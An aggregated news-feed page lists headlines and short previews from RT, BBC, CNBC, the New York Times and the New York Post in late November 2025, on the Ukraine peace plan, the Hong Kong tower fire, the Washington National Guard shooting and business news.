Date of publish: Wed, 26 Nov 2025 12:54:37 +0000

Gaza aid group backed by US and Israel acted as cover for killings – ex-volunteer to RT (VIDEO)

Preview The dismantled Gaza Humanitarian Foundation was a “smoke-screen” created to pave the way for Gaza’s takeover, Anthony Aguilar has told RT
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 12:06:29 +0000

EU scrambling to steal Russian funds

Preview European Commission President Ursula von der Leyen has reaffirmed the EU’s intention to tap frozen Russian assets to bankroll Ukraine
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 11:18:05 +0000

Migrants arrested for gang rape of Italian teen – media

Preview A group of Moroccan men reportedly attacked an Italian couple before raping an 18-year-old and making her fiancé watch
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 11:05:17 +0000

Aid flight crashes in South Sudan

Preview An aid flight carrying supplies for a humanitarian group has crashed in South Sudan, killing all three crew members
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 10:35:10 +0000

Zelensky wants his European backers at Trump meeting

Preview Ukraine’s Vladimir Zelensky has said European leaders should be present at his next meeting with US President Donald Trump
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 10:11:45 +0000

Russia to tighten immigration rules – Security Council

Preview Russia no longer sees immigration as a fix for falling birthrates and will not allow migrants to overstay, Aleksandr Grebenkin has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 10:11:15 +0000

A peace plan with 28 points and 100 pitfalls: What comes next for Ukraine?

Preview Why the Trump plan could trigger peace, paralysis, or a political collapse in Kiev
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 09:50:31 +0000

Dozens of kidnapped Nigerian schoolgirls rescued – officials

Preview Nigeria’s government has announced the rescue of 24 schoolgirls kidnapped by gunmen from a Kebbi State school last week
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 09:25:46 +0000

US warns Ukraine of ‘imminent defeat’ – NBC

Preview Army Secretary Dan Driscoll has urged Kiev to accept a US-drafted peace deal before its battlefield situation gets worse, NBC reports
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 07:48:02 +0000

Putin aide confirms upcoming visit by US negotiators

Preview Russian Presidential aide Yury Ushakov has confirmed a visit to Moscow by US special envoy Steve Witkoff next week
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 06:45:37 +0000

India’s oil imports from Russia to hit five-month high – Reuters

Preview India’s purchases of crude from Russia are expected to reach 1.855 million barrels per day in November
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 05:51:28 +0000

Trump defends Witkoff’s tactics on negotiating Ukraine peace

Preview US President Donald Trump has denied that key negotiator Steve Witkoff has been “too pro-Russian”
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 02:51:17 +0000

Russian negotiator on Ukraine denies phone call leak

Preview Russia’s negotiator on Ukraine, Kirill Dmitriev, has said the transcript of his alleged phone call published by the US media is false
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 00:48:20 +0000

Ukrainians must work – Germany’s Merz

Preview German Chancellor Friedrich Merz has vowed to restrict benefits for Ukrainian refugees unwilling to work
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 23:42:25 +0000

Floods kill at least 13 and displace millions in southern Thailand (VIDEOS)

Preview Heavy flooding in southern Thailand has killed at least 13 people and displaced nearly 2 million across multiple provinces
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 20:55:30 +0000

Fyodor Lukyanov: Peace will come only when Kiev accepts reality

Preview Why Ukraine won’t be immediately forced to accept the 28 points of the peace plan
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 20:54:19 +0000

EU can no longer consider US an ally – ex-bloc foreign policy chief

Preview The EU can no longer consider the US an ally after being sidelined on the Ukraine peace plan, ex-foreign policy chief, Josep Borrell, said
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 20:51:11 +0000

German Christmas markets ‘at risk’ over security costs

Preview German Christmas markets are struggling to cover high security costs to a point where they can be canceled, the organizers have warned
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 20:20:47 +0000

NATO state seeks missiles able to strike deep inside Russia

Preview The Swedish military has said it wants cruise missiles with a range of 2,000 km, citing an alleged Russia threat
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 19:58:38 +0000

‘No one listens’ to Europe on Ukraine – Lavrov

Preview Europe has no place in the peace talks because it uses Kiev as a proxy for trying to defeat Russia, Moscow’s top diplomat has said
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 19:35:02 +0000

Ukrainians will eventually realize how West used them – Russia’s top senator

Preview The Ukraine conflict is the West’s proxy war to inflict a strategic defeat on Russia, Federation Council chief Valentina Matviyenko has said
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 18:12:39 +0000

Ukrainian neo-Nazi fighter admits frontline situation ‘critical’

Preview The situation for Ukraine is becoming critical with the rapid advance of Russian forces, a former Azov commander has warned
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 18:06:12 +0000

The EU’s Ukraine ‘counter-plan’ is a loser’s manifesto

Preview The EU/NATO combo cannot but play the role of pathetic yapping chihuahuas. That’s the price you pay for a matryoshka of supreme stupidity
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 17:53:13 +0000

Ukrainian corruption schemes could have beneficiaries in EU – Lavrov

Preview It is hard to explain the EU’s determination to fund Kiev despite corruption scandals, Russian Foreign Minister Sergey Lavrov has said
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 16:43:35 +0000

Here’s why nobody asked the EU when coming up with the Ukraine peace plan

Preview Brussels and Western European leaders are throwing a tantrum at the negotiations’ kiddie table
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 16:39:06 +0000

Czech raid exposes Ukraine-linked drone deal corruption

Preview A Prague-based Ukraine-affiliated military startup is accused of tax evasion after selling remotely piloted aircraft at a 2,000% markup
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 15:24:51 +0000

A Ukraine peace plan: Where things stand – and why the West still isn’t on the same page

Preview What began as a US-led blueprint to “end the war by Thanksgiving” has turned into a three-way tug-of-war between Washington, the EU and Kiev
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 15:22:55 +0000

No Ukraine peace without lifting Russia sanctions – EU member

Preview EU must lift its sanctions on Russia to conclude a peace agreement, Italian Foreign Minister Antonio Tajani has said
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 15:21:50 +0000

Fugitive Zelensky-linked extortion suspect kept dossiers on officials – investigators

Preview Ukraine’s NABU has accused alleged graft ringleader Timur Mindich of using corrupt law enforcement to get leverage on key figures
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 14:52:12 +0000

Russia to crack down on shadow economy

Preview Russian Finance Minister Anton Siluanov has outlined tackling the shadow economy as a key objective for 2026
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 14:51:59 +0000

EU court orders member state to recognize gay marriage

Preview Poland must recognize foreign same-sex marriages despite being illegal under its constitution, the European Court of Justice has ruled
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 14:45:02 +0000

Russia producing arms at volumes its adversaries ‘could not dream of’ – Rostec CEO

Preview Russia leads the world in shell and bomb output, head of the defense conglomerate Rostec Sergey Chemezov has said
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 14:31:23 +0000

Japanese companies in no rush to leave Russia – survey

Preview More than 70% of Japanese companies operating in Russia do not plan to leave the country’s market despite the sanctions, a survey suggests
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 14:19:36 +0000

Trump ready to talk with Maduro – Axios

Preview The reported move could follow weeks of US “narcoterrorism” strikes on boats off the Venezuelan coast that have killed about 80  
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 14:06:56 +0000

Arrests in South Africa over G20 thefts and protests

Preview South African police have detained over a dozen people for theft targeting foreign delegates
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 14:04:40 +0000

Leader and rival both claim election victory in African state

Preview A spokesperson for the Guinea-Bissau president’s campaign says he has won another term, disputing his rival’s claim to a first-round win
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 12:53:55 +0000

Russia and US in ‘secret’ Ukraine talks – media

Preview A top US military official is reportedly meeting with a Russian delegation to discuss the Ukraine peace plan
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 12:52:11 +0000

Banned at home, welcomed on Moscow’s streets, and a voice of freedom worldwide

Preview Alex La Guma, a South African writer and activist, in the Soviet Union came to symbolize resistance against apartheid
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 12:35:03 +0000

India and Canada close in on $2.8 billion uranium deal as ties warm – media

Preview Canada and India are reportedly close to a uranium deal as part of a broader nuclear cooperation effort
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 11:32:49 +0000

Ethiopian volcano erupts for first time in 10,000 years (VIDEO)

Preview The Hayli-Gubbi volcano in Ethiopia has erupted for the first time in over 10,000 years
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 11:01:41 +0000

Lavrov denounces leak of Trump’s draft peace proposal

Preview Russian Foreign Minister Sergey Lavrov has denounced the leaks of a US proposal to end the Ukraine conflict
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 10:48:36 +0000

UK planning smear campaign against Trump – Russian intelligence

Preview Russia’s Foreign Intelligence Service has warned of a possible British smear campaign against US President Donald Trump
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 10:29:25 +0000

Adolf Hitler running for re-election

Preview Namibian politician Adolf Hitler Uunona, named after the Nazi leader, is expected to win a local election, according to Bild
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 10:26:25 +0000

Russian teen recruited by Kiev to firebomb church – FSB

Preview The FSB reports that it thwarted an attempt to firebomb a church in Kaliningrad Region allegedly backed by Ukraine
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 09:28:57 +0000

Gazprom warns of rising risks for EU gas consumers

Preview Storage levels across the EU slipped below 80%, one of the lowest marks for this time of year in a decade, the Russian energy giant says
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 09:26:43 +0000

Ex-British soldier arrested over murder refused bail

Preview A London court has refused bail for Robert James Purkiss, wanted in Kenya over the 2012 killing of Agnes Wanjiru
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 09:16:25 +0000

DOGE rejects ‘fake’ Reuters report on shutdown

Preview DOGE has dismissed a Reuters report about its shutdown as “fake news,” touting fresh cost-saving efforts
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 08:43:08 +0000

US designates supposed Venezuelan cartel as terrorist organization

Preview The US has designated the ‘Cartel of the Suns’ as a terrorist organization despite doubts that it even exists
Read Full Article at RT.com

Article link

Date of publish: Tue, 25 Nov 2025 08:28:57 +0000

News

News feeds below.

BBC News

Firefighters search for hundreds still missing in devastating Hong Kong tower blocks fire

Dozens of people have died and hundreds remain unaccounted for after Wednesday's blaze.

Article link

Date of publish: Thu, 27 Nov 2025 16:36:03 GMT

Video shows speed fire spreads in Hong Kong tower block

Footage geolocated by BBC Verify show the blaze taking hold in Wang Cheong House.

Article link

Date of publish: Thu, 27 Nov 2025 12:52:23 GMT

Putin doubles down on demands for Ukrainian territory ahead of talks with US in Moscow

The Russian president accuses Kyiv of wanting to fight "to the last Ukrainian" - which he says Russia is also "in principle" ready to do.

Article link

Date of publish: Thu, 27 Nov 2025 22:18:56 GMT

US Top News and Analysis

How Google put together the pieces for its AI comeback

The company's Gemini 3 and Ironwood AI chip are driving Wall Street's excitement behind Alphabet's AI comeback, but challenges remain.

Article link

Date of publish: Thu, 27 Nov 2025 12:00:01 GMT

TikTok-fueled K-beauty boom triggers a retail race in the U.S.

K-beauty has vaulted into the American mainstream, driven by TikTok and younger, more diverse shoppers. Retailers from Ulta to Walmart are racing to cash in.

Article link

Date of publish: Thu, 27 Nov 2025 13:00:02 GMT

Putin breaks his silence on Ukraine peace plan, says Moscow ready for 'serious' talks

Russian President Vladimir Putin said the outlines of a draft peace plan agreed by the U.S. and Ukraine could become the basis of a deal to end the war.

Article link

Date of publish: Thu, 27 Nov 2025 18:40:30 GMT

New York Post

Homebuyers considering Thanksgiving hosting plans when buying next home

A growing number of potential homebuyers are factoring in Thanksgiving as they search for their next home.

Article link

Date of publish: Thu, 27 Nov 2025 18:12:45 -0500

OpenAI blames ‘misuse’ of ChatGPT after 16-year-old kills himself following ‘months of encouragement’

OpenAI blames Adam Raine's suicide on a misuse of technology in new court documents filed in the California lawsuit brought by his parents on November 25.

Article link

Date of publish: Thu, 27 Nov 2025 18:12:38 -0500

Taylor Swift, Hugh Jackman allegedly witnessed Ryan Reynolds confront Justin Baldoni about ‘fat-shaming’ Blake Lively: report

The tense incident allegedly took place in the "Deadpool" star and the "Gossip Girl" alum's NYC apartment.

Article link

Date of publish: Thu, 27 Nov 2025 18:09:41 -0500

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

NYT > Top Stories

D.C. Shooting: What We Know About the National Guard Victims

The father of one of the West Virginia National Guard members who was shot said his daughter had a “mortal wound.” A man at the other member’s home asked for prayers for his son.

Article link

Date of publish: Thu, 27 Nov 2025 23:05:57 +0000

D.C. Shooting Suspect Worked With C.I.A.-Backed Unit in Afghanistan

The C.I.A. and an Afghan intelligence official said that the shooter had been part of an Afghan “partner force,” known as a Zero Unit, trained and supported by the agency in the southern province of Kandahar.

Article link

Date of publish: Thu, 27 Nov 2025 22:02:14 +0000

Hong Kong’s Worst Fire in Decades Fuels Scrutiny of Safety Lapses

The authorities said flammable netting and foam boards may have fueled the city’s deadliest blaze in nearly 70 years, killing more than 80 and prompting arrests.

Article link

Date of publish: Thu, 27 Nov 2025 21:47:57 +0000

BBC News

Firefighters search for hundreds still missing in devastating Hong Kong tower blocks fire

Dozens of people have died and hundreds remain unaccounted for after Wednesday's blaze.

Article link

Date of publish: Thu, 27 Nov 2025 16:36:03 GMT

Video shows speed fire spreads in Hong Kong tower block

Footage geolocated by BBC Verify show the blaze taking hold in Wang Cheong House.

Article link

Date of publish: Thu, 27 Nov 2025 12:52:23 GMT

Putin doubles down on demands for Ukrainian territory ahead of talks with US in Moscow

The Russian president accuses Kyiv of wanting to fight "to the last Ukrainian" - which he says Russia is also "in principle" ready to do.

Article link

Date of publish: Thu, 27 Nov 2025 22:18:56 GMT

Palestinian-US teen freed after nine months in Israeli jail

Mohammed Ibrahim, now 16, was on holiday from Florida when he was arrested for allegedly throwing rocks at Jewish settlers in the occupied West Bank.

Article link

Date of publish: Thu, 27 Nov 2025 20:17:52 GMT

US suspends immigration requests for Afghans after National Guard shooting

The alleged gunman in the Washington shooting is an Afghan national who entered the US in September 2021.

Article link

Date of publish: Thu, 27 Nov 2025 11:14:08 GMT

France to bring in form of military service, 25 years after conscription was phased out

"The only way to avoid danger is to prepare for it," says President Emmanuel Macron.

Article link

Date of publish: Thu, 27 Nov 2025 12:14:30 GMT

Venezuela bans six major airlines after tensions with US escalate

The affected carriers ceased flying to Venezuela after the US warned of heightened military activity.

Article link

Date of publish: Thu, 27 Nov 2025 11:03:33 GMT

Fracking has transformed an Argentine town - but what about the nation?

Argentina hopes that an oil and gas boom can benefit the whole country.

Article link

Date of publish: Thu, 27 Nov 2025 00:02:47 GMT

Year after ceasefire, peace eludes south Lebanon as Israeli strikes continue

A year on from a ceasefire in Lebanon, Israel is continuing attacks on what it says are Hezbollah's efforts to recover from their war.

Article link

Date of publish: Thu, 27 Nov 2025 06:00:14 GMT

Pope Leo on first foreign trip says future of humanity at stake from conflict

The Pope makes his first foreign trip to Turkey and says a third world war is being "fought piecemeal".

Article link

Date of publish: Thu, 27 Nov 2025 15:04:12 GMT

General named new Guinea-Bissau leader a day after coup

Gen Horta N’Tam is sworn in during a ceremony at the army headquarters.

Article link

Date of publish: Thu, 27 Nov 2025 15:07:44 GMT

South Africa hits back after Trump says US won't invite it for G20 next year

The US boycotted the G20 summit in Johannesburg over widely discredited claims of persecution of the white minority.

Article link

Date of publish: Thu, 27 Nov 2025 14:24:55 GMT

Police investigate theft of four dogs from Malawi presidential palace

Police search ex-President Chakwera's residence after a suspect said the dogs were being kept there.

Article link

Date of publish: Thu, 27 Nov 2025 10:35:27 GMT

Where peace stands in Ukraine after frantic diplomacy

The Trump administration seems serious about reaching a deal despite all the apparent chaos around its efforts.

Article link

Date of publish: Wed, 26 Nov 2025 15:29:13 GMT

Soldiers seize power in Guinea-Bissau and detain the president

The military takeover comes as the West African nation was awaiting the results of Sunday's election.

Article link

Date of publish: Thu, 27 Nov 2025 07:17:24 GMT

Trump defends Witkoff after leak appears to show envoy coaching Russia

The US president said he had not heard the audio, but that it sounded like "standard" negotiations.

Article link

Date of publish: Wed, 26 Nov 2025 10:25:06 GMT

Nicolas Sarkozy illegal campaign financing conviction upheld

The former French president will have to serve a six-month term with an electronic bracelet, plus another six months suspended.

Article link

Date of publish: Wed, 26 Nov 2025 15:11:59 GMT

Teens launch High Court challenge to Australia's social media ban

They argue the law - which will block users under 16 from having social media accounts - is unconstitutional.

Article link

Date of publish: Wed, 26 Nov 2025 06:37:56 GMT

Chicago man accused of setting train passenger on fire had 72 prior arrests

The victim was reading her phone while riding on a train when the man allegedly doused her with gasoline.

Article link

Date of publish: Wed, 26 Nov 2025 13:54:36 GMT

Italian parliament unanimously votes to make femicide a crime

The gender-motivated murder of a woman will now be covered by a distinct clause in Italian law - punishable by a life sentence.

Article link

Date of publish: Wed, 26 Nov 2025 00:36:49 GMT

'Once in 300 years' rain hits Thai city as floods ravage South East Asia

The deadly floods have affected 2 million people, the majority of whom are still cut off from help.

Article link

Date of publish: Wed, 26 Nov 2025 09:29:52 GMT

'I am devastated': Hong Kong residents in disbelief after fire destroys blocks of flats

Efforts to control the blaze are continuing as locals wait for news of missing loved ones.

Article link

Date of publish: Thu, 27 Nov 2025 15:03:14 GMT

What we know about the Hong Kong apartment fires

The death toll continues to rise and hundreds are missing, as firefighters struggle to put out the fire.

Article link

Date of publish: Thu, 27 Nov 2025 18:54:16 GMT

They can't crush our protests, vow Georgians after year of resistance

The demonstrations began when Georgia's prime minister called a four-year halt on moves towards joining the EU.

Article link

Date of publish: Thu, 27 Nov 2025 00:03:12 GMT

'I panic every time she coughs' - Delhi's toxic air is making its children sick

Hospitals have seen an influx of children sneezing, coughing or complaining of breathing difficulties.

Article link

Date of publish: Thu, 27 Nov 2025 01:02:03 GMT

Stone-throwing anger unnerves Zambia's 'fix-it' president

After 2021's landslide win, Hakainde Hichilema has nine months to convince voters he deserves a second term.

Article link

Date of publish: Thu, 27 Nov 2025 00:03:47 GMT

US transportation secretary wants more civility in air travel. Not everyone is on board

Experts say a public service campaign is missing the mark as US airports brace for the busiest holiday season in years.

Article link

Date of publish: Wed, 26 Nov 2025 21:43:21 GMT

Watch: Dawn aerial footage reveals scale of Hong Kong apartment blaze

More than 800 firefighters were still tackling the blaze at Wang Fuk Court this morning.

Article link

Date of publish: Thu, 27 Nov 2025 03:28:52 GMT

BBC on the scene of the Hong Kong apartment block blaze

At least 44 people have been killed in the fire, which took local authorities 18 hours to bring under control.

Article link

Date of publish: Thu, 27 Nov 2025 06:55:53 GMT

Watch: How the shooting of two National Guard members unfolded

The two soldiers are in critical condition after being attacked blocks from the White House in Washington DC.

Article link

Date of publish: Wed, 26 Nov 2025 23:27:17 GMT

Watch: Car nearly hits first responders in Midwest blizzard conditions

Winter storm alerts and hazardous weather outlooks have been issued for parts of the US ahead of the Thanksgiving holiday.

Article link

Date of publish: Thu, 27 Nov 2025 01:12:05 GMT

Watch: Moment researcher finds rare flower after 13-year search

Researcher Septian Andriki collapsed in tears upon discovering the rare Rafflesia hasseltii plant in Indonesia.

Article link

Date of publish: Wed, 26 Nov 2025 06:58:20 GMT

Popemobile becomes a mobile health clinic for Gaza children

The vehicle had transported the late Pope Francis on a visit to Bethlehem in 2014.

Article link

Date of publish: Tue, 25 Nov 2025 14:51:12 GMT

US Top News and Analysis

How Google put together the pieces for its AI comeback

The company's Gemini 3 and Ironwood AI chip are driving Wall Street's excitement behind Alphabet's AI comeback, but challenges remain.

Article link

Date of publish: Thu, 27 Nov 2025 12:00:01 GMT

TikTok-fueled K-beauty boom triggers a retail race in the U.S.

K-beauty has vaulted into the American mainstream, driven by TikTok and younger, more diverse shoppers. Retailers from Ulta to Walmart are racing to cash in.

Article link

Date of publish: Thu, 27 Nov 2025 13:00:02 GMT

Putin breaks his silence on Ukraine peace plan, says Moscow ready for 'serious' talks

Russian President Vladimir Putin said the outlines of a draft peace plan agreed by the U.S. and Ukraine could become the basis of a deal to end the war.

Article link

Date of publish: Thu, 27 Nov 2025 18:40:30 GMT

Black Friday is most popular with Gen Z, even as the holiday loses its shine, new survey finds

A new AT&T survey found that members of Generation Z are the biggest Black Friday shoppers, while older generations shop closer to Christmas.

Article link

Date of publish: Wed, 26 Nov 2025 19:07:54 GMT

Black Friday car deals are sparser this year, analyst says: 'Buyers may be a little disappointed'

While there's ample inventory to choose from, car shoppers may have a hard time finding any generous Black Friday or end-of-year deals.

Article link

Date of publish: Wed, 26 Nov 2025 12:35:01 GMT

With Trump's tax bill set to dent giving by the wealthy, can middle-class donors make up the difference?

Next year, some 140 million Americans will get a new tax break on donations. Experts warn it's unclear whether they will use it.

Article link

Date of publish: Thu, 27 Nov 2025 14:00:01 GMT

SEC investigates Jefferies over First Brands collapse, report says

The FT said the SEC is looking into whether Jefferies gave investors enough information on their exposure to the failed auto business.

Article link

Date of publish: Thu, 27 Nov 2025 18:02:34 GMT

88-year-old Morgan Freeman shares the secrets to his long life and 60-year career: 'Keep getting up in the morning, keep moving'

At 88 years old, renowned actor Morgan Freeman doesn't plan to retire. Here's what he says is his secret to longevity.

Article link

Date of publish: Thu, 27 Nov 2025 16:00:01 GMT

Psychologists say this 'green flag' is one of the strongest predictors of a successful relationship—it can be 'hard to spot'

Couples counselor Baya Voce says that this green flag is a sure sign of relationship success, but it can be "hard to spot early on."

Article link

Date of publish: Thu, 27 Nov 2025 14:00:01 GMT

'Green light' away from AI trade: Two ETF executives see a key market shift underway

Markets may have entered a new cycle. Here's why.

Article link

Date of publish: Thu, 27 Nov 2025 21:00:01 GMT

Saba Capital activist Boaz Weinstein calls for removal of Baillie Gifford-run tech investment trust’s entire board

Activist hedge fund manager Boaz Weinstein wants to replace the entire board of Baillie Gifford's EWI trust.

Article link

Date of publish: Thu, 27 Nov 2025 15:11:28 GMT

Apple is challenging India's antitrust body over a potential $38 billion fine

Apple filed a lawsuit against the Competition Commission of India over how the body uses global turnover when calculating fines.

Article link

Date of publish: Thu, 27 Nov 2025 12:36:32 GMT

35-year-old American left the U.S. for the U.K., spends about $2,532 a month: 'This is where I'm supposed to be'

Chanel Rivers moved to London in October 2024 after planning a move on and off since 2019.

Article link

Date of publish: Thu, 27 Nov 2025 15:00:01 GMT

Alibaba's AI glasses to rival Meta go on sale for $500

Alibaba, like other tech giants such as Meta, are betting that smart glasses could be the next big consumer device after the smartphone.

Article link

Date of publish: Thu, 27 Nov 2025 09:07:07 GMT

Why Medicare price negotiations matter for Novo Nordisk, AstraZeneca, and other European pharma companies

Pharma companies are facing pricing pressure from several directions, including from the U.S. Medicare negotiations

Article link

Date of publish: Wed, 26 Nov 2025 17:18:29 GMT

Chinese giants rush to pledge millions after Hong Kong’s deadliest fire since 1948 kills 55

Chinese entrepreneurs have ramped up their charitable commitments in recent years to heed Beijing's call to put social responsibility before profits.

Article link

Date of publish: Thu, 27 Nov 2025 15:00:22 GMT

'Zootopia 2,' 'Wicked: For Good' lead Thanksgiving box office

Disney's "Zootopia 2" and Universal's "Wicked: For Good" are set for strong Thanksgiving box office haul, but not as big as 2024's record-breaking tally.

Article link

Date of publish: Wed, 26 Nov 2025 17:50:45 GMT

Puma shares pop 18% after report China's Anta Sports is looking to buy the sportswear giant

China's Anta Sports is among a number of firms looking to buy the German athletic brand, according to a media report.

Article link

Date of publish: Thu, 27 Nov 2025 16:38:46 GMT

Judge dismisses Trump election interference racketeering case in Georgia

Fulton County Superior Court Judge Scott McAfee's ruling ends the final case against Trump that remained unresolved after he returned to the White House.

Article link

Date of publish: Wed, 26 Nov 2025 19:56:27 GMT

Europe’s slow and steady approach to AI could be its edge

Grid congestion and tough sustainability regulations are barriers to a rapid AI built-out, but these challenges benefit Europe in the long-run.

Article link

Date of publish: Thu, 27 Nov 2025 07:52:27 GMT

China industrial profits drop 5.5% in October, worst performance in five months

While manufacturers find some relief from the trade pact, weak domestic demand and uncertainties in global trade continue to cast a shadow over the outlook.

Article link

Date of publish: Thu, 27 Nov 2025 03:35:57 GMT

MIT study finds AI can already replace 11.7% of U.S. workforce

Artificial intelligence can already replace 11.7% of the U.S. labor market, across finance, health care and professional services, according to MIT's study.

Article link

Date of publish: Wed, 26 Nov 2025 17:16:54 GMT

Apple iPhone shipments to beat Samsung for the first time in 14 years, report says

Apple's success is being driven by its iPhone 17 series launched in September.

Article link

Date of publish: Wed, 26 Nov 2025 14:39:06 GMT

India stocks hit record highs as Asia markets track Wall Street gains on tech rebound

Overnight, shares of artificial intelligence player Oracle boosted major U.S. averages after Deutsche Bank reaffirmed its bullish stance on the name.

Article link

Date of publish: Thu, 27 Nov 2025 08:19:58 GMT

Manhattan condo values fell over the past decade. Here's why rents are still rising

More wealthy New Yorkers are choosing to rent as condos lose value in Manhattan.

Article link

Date of publish: Wed, 26 Nov 2025 12:39:16 GMT

‘Rush Hour 4’ revived after Trump urged Paramount Skydance to resurrect franchise: Reports

Studios earlier declined a fourth "Rush Hour" over concerns about director Brett Ratner, whose career crashed after sexual misconduct allegations he denies.

Article link

Date of publish: Wed, 26 Nov 2025 02:33:04 GMT

Netflix suffers brief outage during 'Stranger Things' season-five debut

Users on social media earlier posted that they were experiencing issues, and DownDetector.com showed that reports spiked around 9 p.m. Eastern.

Article link

Date of publish: Thu, 27 Nov 2025 04:03:53 GMT

Eric Swalwell sues FHFA chief Pulte, alleging director used private information to attack Trump critics

Eric Swalwell alleges FHFA's Pulte used federal mortgage data to hurt Trump’s critics, leaking details about Swalwell family home ahead of his campaign launch.

Article link

Date of publish: Wed, 26 Nov 2025 19:26:35 GMT

CNBC's The China Connection newsletter: Foreign investors warm to China’s cheaper AI valuations despite fears of a U.S. bubble

For all the worries about a bubble in U.S. AI spending, capital flows into China's tech sector is far less, pushing startups to do more with less.

Article link

Date of publish: Wed, 26 Nov 2025 23:31:53 GMT

Workday shares sink on subscription revenue guidance concerns

Workday delivered turkey without the gravy, according to analysts at Evercore.

Article link

Date of publish: Wed, 26 Nov 2025 21:21:04 GMT

New York Post

Homebuyers considering Thanksgiving hosting plans when buying next home

A growing number of potential homebuyers are factoring in Thanksgiving as they search for their next home.

Article link

Date of publish: Thu, 27 Nov 2025 18:12:45 -0500

OpenAI blames ‘misuse’ of ChatGPT after 16-year-old kills himself following ‘months of encouragement’

OpenAI blames Adam Raine's suicide on a misuse of technology in new court documents filed in the California lawsuit brought by his parents on November 25.

Article link

Date of publish: Thu, 27 Nov 2025 18:12:38 -0500

Taylor Swift, Hugh Jackman allegedly witnessed Ryan Reynolds confront Justin Baldoni about ‘fat-shaming’ Blake Lively: report

The tense incident allegedly took place in the "Deadpool" star and the "Gossip Girl" alum's NYC apartment.

Article link

Date of publish: Thu, 27 Nov 2025 18:09:41 -0500

Taylor Swift, Hugh Jackman allegedly witnessed Ryan Reynolds confront Justin Baldoni about ‘fat-shaming’ Blake Lively: report

The tense incident allegedly took place in the "Deadpool" star and the "Gossip Girl" alum's NYC apartment.

Article link

Date of publish: Thu, 27 Nov 2025 18:09:41 -0500

Dana White makes shock interim title fight announcement for UFC 324: Justin Gaethje vs. Paddy Pimblett

The UFC enters its post-pay-per-view era on Paramount+ with a pair of championships up for grabs: one an anticipated superfight and the other far more unexpected. UFC 324 on Jan. 24 in Las Vegas will be headlined by an interim lightweight title fight between Justin Gaethje and Paddy Pimblett — with undisputed champion Ilia Topuria...

Article link

Date of publish: Thu, 27 Nov 2025 18:08:44 -0500

All the best Nintendo Switch Black Friday deals calling my name

Just take my money, Mario!

Article link

Date of publish: Thu, 27 Nov 2025 18:00:00 -0500

New details emerge from investigation into disappearance of American citizen on cruise ship excursion

Ann Evans, 55, was reported missing from a Holland America Line cruise on Nov. 20 after she vanished during a planned tour to Sint Maarten, the Dutch side of a Caribbean island.

Article link

Date of publish: Thu, 27 Nov 2025 17:52:04 -0500

Americans who helped resettle Afghan allies feel ‘betrayed’ by suspected DC terrorist who was given safe haven

Americans who helped resettle Afghan allies in the US following the Biden administration's 2021 disastrous withdrawal from Kabul are heartbroken and angry about the "betrayal" of Rahmanullah Lakanwal, the accused terrorist and force Afghan evacuee behind the DC Thanksgiving eve shooting.

Article link

Date of publish: Thu, 27 Nov 2025 17:41:41 -0500

Robert A.M. Stern, prominent NYC-born architect renowned for Central Park staple, dead at 86

The statement did not specify a cause of death, but said Stern “died comfortably at his home.”

